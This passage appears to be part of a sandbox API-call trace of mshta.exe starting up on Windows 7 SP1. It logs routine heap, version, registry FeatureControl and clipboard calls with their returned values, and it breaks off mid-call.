0x760000 [0064.685] GetVersion () returned 0x1db10106 [0064.685] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.686] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.686] HeapSetInformation (HeapHandle=0x760000, HeapInformationClass=0x0, HeapInformation=0x33f4e8, HeapInformationLength=0x4) returned 1 [0064.851] malloc (_Size=0x80) returned 0x112640 [0064.851] GetVersion () returned 0x1db10106 [0064.927] GetVersionExA (in: lpVersionInformation=0x33f3c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f3c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.927] __dllonexit () returned 0x74d1717c [0064.927] __dllonexit () returned 0x74d173bd [0064.927] GetProcessHeap () returned 0x760000 [0064.927] __dllonexit () returned 0x74d17435 [0064.927] __dllonexit () returned 0x74d16e75 [0064.927] __dllonexit () returned 0x74d16ff5 [0064.927] __dllonexit () returned 0x74d171be [0064.927] __dllonexit () returned 0x74d172e2 [0064.927] __dllonexit () returned 0x74d17320 [0064.928] __dllonexit () returned 0x74d17370 [0064.928] __dllonexit () returned 0x74d16e53 [0064.928] __dllonexit () returned 0x74d16e66 [0064.928] __dllonexit () returned 0x74d16a3e [0064.928] __dllonexit () returned 0x74d16a46 [0064.928] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.928] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.929] __dllonexit () returned 0x74d16a60 [0064.929] __dllonexit () returned 0x74d16a7a [0064.929] __dllonexit () returned 0x74d16a93 [0064.929] __dllonexit () returned 0x74d16aa7 [0064.929] __dllonexit () returned 0x74d16ac1 [0064.929] __dllonexit () returned 0x74d171f1 [0064.929] __dllonexit () returned 0x74d16ad0 [0064.929] __dllonexit () returned 0x74d16adf [0064.929] __dllonexit () returned 0x74d16aee [0064.930] __dllonexit () returned 0x74d16afd [0064.930] __dllonexit () returned 0x74d16b0d [0064.930] __dllonexit () returned 0x74d1720c [0064.930] __dllonexit () returned 0x74d16b1c [0064.930] __dllonexit () returned 0x74d16b2f [0064.930] __dllonexit () returned 0x74d16b49 [0064.930] __dllonexit () returned 0x74d16b58 [0064.930] __dllonexit () returned 0x74d16b67 [0064.930] __dllonexit () returned 0x74d16b76 [0064.931] __dllonexit () returned 0x74d16b85 [0064.931] __dllonexit () returned 0x74d16b94 [0064.931] __dllonexit () returned 0x74d16ba3 [0064.931] __dllonexit () returned 0x74d16bb2 [0064.931] __dllonexit () returned 0x74d16bc1 [0064.931] __dllonexit () returned 0x74d16bd0 [0064.931] __dllonexit () returned 0x74d16bdf [0064.931] __dllonexit () returned 0x74d16bee [0064.931] __dllonexit () returned 0x74d16bfd [0064.931] __dllonexit () returned 0x74d16c0c [0064.932] __dllonexit () returned 0x74d16c1b [0064.932] __dllonexit () returned 0x74d16c2a [0064.932] __dllonexit () returned 0x74d16c3d [0064.932] __dllonexit () returned 0x74d16c4c [0064.932] __dllonexit () returned 0x74d16c5b [0064.932] __dllonexit () returned 0x74d16c75 [0064.932] __dllonexit () returned 0x74d16c8f [0064.932] __dllonexit () returned 0x74d16ca9 [0064.933] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.933] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.933] __dllonexit () returned 0x74d16cb1 [0064.933] __dllonexit () returned 0x74d17294 [0064.933] __dllonexit () returned 0x74d16ccb [0064.933] __dllonexit () returned 0x74d16cd3 [0064.933] __dllonexit () returned 0x74d16ce2 [0064.934] __dllonexit () returned 0x74d16cf1 [0064.934] __dllonexit () returned 0x74d16d00 [0064.934] __dllonexit () returned 0x74d0f72d [0064.934] __dllonexit () returned 0x74d16d43 [0064.934] __dllonexit () returned 0x74d16d56 [0064.934] __dllonexit () returned 0x74d0f095 [0064.934] __dllonexit () returned 0x74d16d65 [0064.934] __dllonexit () returned 0x74d16d78 [0064.934] __dllonexit () returned 0x74d16d87 [0064.935] __dllonexit () returned 0x74d16d9a [0064.935] __dllonexit () returned 0x74d12256 [0064.935] __dllonexit () returned 0x74d1679d [0064.935] __dllonexit () returned 0x74d16dd5 [0064.935] __dllonexit () returned 0x74d16df8 [0064.935] __dllonexit () returned 0x74d16e07 [0064.935] __dllonexit () returned 0x74d176cb [0064.936] __dllonexit () returned 0x74d16e1a [0064.936] __dllonexit () returned 0x74d172aa [0064.936] __dllonexit () returned 0x74d172cb [0064.936] __dllonexit () returned 0x74d16e3a [0064.936] GetCurrentThreadId () returned 0x544 [0064.936] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xb8f9e278, Data2=0xe2, Data3=0x47a6, Data4=([0]=0xae, [1]=0xf6, [2]=0xa6, [3]=0x27, [4]=0xd6, [5]=0xc9, [6]=0x45, [7]=0x41))) returned 0x0 [0064.939] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x77e988 [0064.939] __dllonexit () returned 0x74d1733d [0064.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33ee60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0064.939] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0064.939] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0064.939] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0064.939] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x77eb90 [0064.939] SHRegGetValueW () returned 0x2 [0064.939] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0ac | out: phkResult=0x33f0ac*=0x0) returned 0x2 [0064.939] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a8 | out: phkResult=0x33f0a8*=0x0) returned 0x2 [0064.940] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0064.940] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.016] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.085] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.085] RegCloseKey (hKey=0x0) returned 0x6 [0065.085] RegCloseKey (hKey=0x0) returned 0x6 [0065.085] RegCloseKey (hKey=0x94) returned 0x0 [0065.085] RegCloseKey (hKey=0x98) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.085] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x98) returned 0x0 [0065.086] RegCloseKey (hKey=0x94) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.086] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.086] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x94) returned 0x0 [0065.087] RegCloseKey (hKey=0x98) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.087] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.087] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x9c) returned 0x0 [0065.087] SHRegGetValueW () returned 0x2 [0065.087] SHRegGetValueW () returned 0x2 [0065.087] RegCloseKey (hKey=0x9c) returned 0x0 [0065.087] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x0) returned 0x6 [0065.087] RegCloseKey (hKey=0x98) returned 0x0 [0065.088] RegCloseKey (hKey=0x94) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.088] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.088] RegCloseKey (hKey=0x0) returned 0x6 [0065.088] RegCloseKey (hKey=0x0) returned 0x6 [0065.088] RegCloseKey (hKey=0x94) returned 0x0 [0065.088] RegCloseKey (hKey=0x98) returned 0x0 [0065.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.167] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.167] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.167] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x98) returned 0x0 [0065.168] RegCloseKey (hKey=0x94) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.168] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x0) returned 0x6 [0065.168] RegCloseKey (hKey=0x94) returned 0x0 [0065.168] RegCloseKey (hKey=0x98) returned 0x0 [0065.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.169] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.169] RegCloseKey (hKey=0x0) returned 0x6 [0065.169] RegCloseKey (hKey=0x0) returned 0x6 [0065.169] RegCloseKey (hKey=0x98) returned 0x0 [0065.169] RegCloseKey (hKey=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.169] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.170] RegCloseKey (hKey=0x94) returned 0x0 [0065.170] RegCloseKey (hKey=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.170] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.170] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x98) returned 0x0 [0065.171] RegCloseKey (hKey=0x94) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x94) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.171] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x0) returned 0x6 [0065.171] RegCloseKey (hKey=0x94) returned 0x0 [0065.171] RegCloseKey (hKey=0x98) returned 0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.172] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.172] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.172] RegCloseKey (hKey=0x0) returned 0x6 [0065.172] RegCloseKey (hKey=0x0) returned 0x6 [0065.172] RegCloseKey (hKey=0x98) returned 0x0 [0065.172] RegCloseKey (hKey=0x94) returned 0x0 [0065.172] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x9c) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.175] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.175] RegCloseKey (hKey=0x0) returned 0x6 [0065.175] RegCloseKey (hKey=0x0) returned 0x6 [0065.175] RegCloseKey (hKey=0x98) returned 0x0 [0065.175] RegCloseKey (hKey=0x9c) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x9c) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.176] RegCloseKey (hKey=0x9c) returned 0x0 [0065.176] RegCloseKey (hKey=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x9c) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.177] RegCloseKey (hKey=0x0) returned 0x6 [0065.177] RegCloseKey (hKey=0x98) returned 0x0 [0065.177] RegCloseKey (hKey=0x9c) returned 0x0 [0065.177] GetSystemMetrics (nIndex=68) returned 4 [0065.177] GetSystemMetrics (nIndex=69) returned 4 [0065.177] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0065.178] GetSystemDefaultLCID () returned 0x409 [0065.178] GetVersionExW (in: lpVersionInformation=0x33f004*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f004*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.178] GetUserDefaultUILanguage () returned 0x409 [0065.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x33ef54, cchData=16 | out: lpLCData="\x03") returned 16 [0065.180] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33ef84 | out: lpList=0x33ef84) returned 1 [0065.180] GetSystemMetrics (nIndex=4096) returned 0 [0065.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a8 | out: phkResult=0x33f0a8*=0x9c) returned 0x0 [0065.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0ac | out: phkResult=0x33f0ac*=0x98) returned 0x0 [0065.180] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f068 | out: phkResult=0x33f068*=0x0) returned 0x2 [0065.181] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f068 | out: phkResult=0x33f068*=0x0) returned 0x2 [0065.181] RegCloseKey (hKey=0x0) returned 0x6 [0065.181] RegCloseKey (hKey=0x0) returned 0x6 [0065.181] RegCloseKey (hKey=0x9c) returned 0x0 [0065.181] RegCloseKey (hKey=0x98) returned 0x0 [0065.181] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x33ef10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.181] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x3e) returned 0x773f38 [0065.181] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.181] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.181] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0065.181] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.181] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.181] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.181] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.181] GetDC (hWnd=0x0) returned 0x100109eb [0065.182] SHCreateShellPalette (hdc=0x0) returned 0xe0806e9 [0065.182] GetPaletteEntries (in: hpal=0xe0806e9, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.182] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.182] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.182] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.182] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20a) returned 0x77ebd0 [0065.183] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2000) returned 0x77f5e8 [0065.183] GetCurrentProcessId () returned 0x7bc [0065.183] _vsnprintf (in: _DstBuf=0x33f454, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x33f11c | out: _DstBuf="#MSHTML#PERF#000007BC") returned 21 [0065.183] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#000007BC") returned 0x0 [0065.183] GetVersionExW (in: lpVersionInformation=0x33f138*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x763828, dwMinorVersion=0x100, dwBuildNumber=0x77ddd0, dwPlatformId=0x760000, szCSDVersion="A") | out: lpVersionInformation=0x33f138*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.183] GetModuleHandleW 